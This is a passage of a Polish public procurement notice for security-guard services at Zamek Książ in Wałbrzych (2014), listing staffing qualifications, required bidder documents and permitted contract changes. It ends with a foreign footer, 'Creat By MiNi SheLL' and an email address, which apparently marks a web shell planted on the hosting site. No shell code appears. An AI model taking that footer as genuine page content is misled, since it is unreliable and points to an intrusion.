zabezpiecze-nia technicznego, lub potwierdzenie posiadania kwalifikacji do wykonywania za-wodu pracownika  ochrony fizycznej lub potwierdzenie posiadania kwalifikacji pracownika zabezpieczenia technicznego uznanych na podstawie ustawy z dnia 18.03.2008r. z późn. zmianami  o zasadach kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, - zaświadczenie lub świadectwo potwierdzające przygotowanie teoretyczne i praktyczne w zakresie wyszkole-nia strzeleckiego, samoobrony, technik interwencyjnych oraz znajomości prawa związanych z wykonywaniem ochrony osób i mienia w przypadku osób wpisa-nych na listę kwalifikowanych pracowników ochrony fizycznej, - zaświadczenie potwierdzające odbycie kursu pracownika zabezpieczenia technicznego lub za-świadczenie o przyuczeniu do zawodu w przypadku pracowników zabezpiecze-nia technicznego, - dokumenty potwierdzające wykształcenie, - zaświadczenia lub świadectwa pracy  potwierdzające staż pracy w zawodzie.1.3.2. Wymagane osoby: a) minimum 2 osoby posiadające wpis na listę kwalifikowanych praco-wników ochrony fizycznej zgodnie z przepisami dotyczącymi ochrony osób  i mienia  (Ustawa z dnia 22 sierpnia 1997r. z późn. zm.) i mogące wykazać co najmniej 24-miesięczny staż pracy w ochronie osób i mienia oraz  posiadają-cych minimum średnie wykształcenie, które  będą nadzorować i kontrolować pracę pracowników ochrony fizycznej stałej i doraźnej oraz dozorujących sygna-ły przesyłane, gromadzone i przetwarzane w elektronicznych urządzeniach i sy-stemach alarmowych nieposiadających wpisu na listę kwalifikowanych pracowni-ków ochrony fizycznej; b) minimum 5 osób przeznaczonych do bezpośredniego stałego dozoru sygnałów przesyłanych, gromadzonych i przetwarzanych w ele-ktronicznych urządzeniach i systemach alarmowych, nieposiadających wpisu na listę  kwalifikowanych pracowników ochrony, mogących wykazać  co najmniej 24-miesięczny staż pracy w zakresie ochrony  oraz posiadających minimum średnie wykształcenie lub posiadających wpis na listę kwalifikowanych praco-wników ochrony; c) minimum 20 osób przeznaczonych do bezpośredniego sta-łego dozoru osób i mienia i mogące wykazać co najmniej 12-to miesięczny staż pracy w ochronie osób i mienia oraz posiadających minimum zawodowe wy-kształcenie, nieposiadających wpisu na listę  kwalifikowanych pracowników ochrony  lub posiadających wpis na listę kwalifikowanych pracowników ochrony;
W przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udziele-nie zamówienia, fakt dysponowania osobami zdolnymi do wykonania niniejsze-go zamówienia oceniany będzie łącznie.Zamawiający uzna warunek  za spełnio-ny  na podstawie złożonego przez Wykonawcę oświadczenia w tym zakresie i przedłożonych dokumentów. Ocena spełnienia warunku dokonana zostanie zgo-dnie z regułą: spełnia warunek - nie spełnia  warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć odpowiednie dokumenty w formie oryginału lub kserokopii po-świadczonej za zgodność z oryginałem. W przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie zamówienia, oceniane będą łącznie posiadana wiedza i doświadczenie: a) Posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem zamówienia na kwotę nie niższą niż 500 000 PLN ( sło-wnie: pięćset tysięcy złotych). W przypadku, gdy Wykonawca przedstawi pol-isę o wartości wyrażonej w innej walucie niż PLN, Zamawiający dokona przeli-czenia na PLN po kursie ogłoszonym przez Narodowy Bank Polski dla danej waluty z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publi-cznych.Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia w tym zakresie i przedłożonych dokumentów. Ocena spełnienia warunku dokonana zostanie zgodnie z regułą: spełnia warunek - nie spełnia  warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Projekt umowy, który zawarty będzie z Wykonawcą stanowi załącznik nr 7 do SIWZ. 2. Zamawiający dopuszcza ewentualną zmianę następujących posta-nowień umownych: 2.1.Terminu realizacji umowy, gdy zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkują-ca brakiem możliwości należytego wykonania umowy zgodnie ze Specyfikacją Istotnych Warunków Zamówienia, zmianami przepisów prawa, które nastąpiły w czasie realizacji zamówienia lub wystąpienia zdarzenia spowodowane siłą wyższą.2.2. Zmiany wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki procentowej należnego podatku VAT. 2.3 Zmiana wymaganej liczby stanowisk (posterunków) obsługiwanych przez Wykonawcę, wskazanych w Części II SIWZ w punkcie 1.2 w następują-cych sytuacjach:2.3.1 W przypadku, gdy nie dojdzie do uruchomienia muzeal-nej części wystawienniczej w sektorze Zamku  wskazanym w Części II SIWZ punkcie 1.2 podpunkt b), zakres tej części usługi dla oszacowanej ilości godzin, odpowiedniej dla maksymalnej ilości stanowisk pracy (to jest sześciu), może ulec w okresie obowiązywania umowy zmniejszeniu do trzech stanowisk pracy. 
2.3.2. W przypadku zmiany planowanego terminu sprowadzenia nowych ekspo-zycji muzealnych, przeznaczonych na doposażenie sal na I piętrze Zamku, za-kres usługi wskazanej w Części II SIWZ punkcie 1.2 może ulec zmniejszeniu w pierwszym okresie świadczenia usług przez Wykonawcę (to jest od 1  grudnia 2014 roku do 31 stycznia 2015 r.) o maksymalnie 3 stanowiska pracy. 2.4. Osób przewidzianych do realizacji zamówienia w przypadkach: 2.4.1. śmierci, choroby lub innych zdarzeń losowych uniemożliwiającym osobom wskazanym do realizacji zamówienia wykonywanie przedmiotowej usługi, 2.4.2. nie wywią-zywanie się osób z należytego wykonywania przedmiotu zamówienia, 2.4.3. wystąpienie innych przyczyn niezależnych od Wykonawcy np. rezygnacji z pra-cy osób wskazanych do realizacji usług, skutkujących koniecznością zmiany osób przewidzianych do realizacji zamówienia.2.5. Kwalifikacje i doświadczenie nowych osób wyznaczonych przez Wykonawcę do realizacji umowy, muszą speł-niać warunki zawarte w niniejszej SIWZ. Warunkiem dopuszczenia nowych osób do realizacji zamówienia w  ramach niniejszej umowy jest akceptacja Za-mawiającego. 2.6. Zmiany osób będących przedstawicielami Zamawiającego lub Wykonawcy. 2.7. Zamawiający dopuszcza ewentualną zmianę postanowień umownych gdy zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z niniejszą Specyfikacją w szczególności terminu realizacji zamówienia. 2.8. Dopuszcza zmianę umowy w formie aneksu, jeżeli zajdzie potrzeba  w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu praw-nego. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzię-cia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie spowoduje zmiany wynagrodzenia wykonawcy, a jej inicjatorem może być Za-mawiający lub Wykonawca. 2.9. Umowa może być zmieniona w przypadku, kiedy w umowie znajdują się oczywiste błędy pisarskie lub rachunkowe, a także zapisy, których wykonanie jest niemożliwe ze względu na obowiązujące przepi-sy prawa - w zakresie, który jest niezbędny do wyeliminowania tych błędów.
2.10. Wykonawca nie będzie uprawniony do wystąpienia z wnioskiem o przedłu-żenie terminu wykonania umowy, zwiększenie wynagrodzenia, jeżeli konieczno-ść dokonania zmiany została spowodowana przez jakikolwiek błąd lub opóźnie-nie ze strony Wykonawcy włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ksiaz.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamek Książ w Wałbrzychu Spółka Z O.O., 58-306 Wałbrzych ul. Piastów Śląskich 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 10:00, miejsce: Zamek Książ w Wałbrzychu Spółka z o.o., 58-306 Wałbrzych, ul. Piastów Śląskich 1, pokój nr 22 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com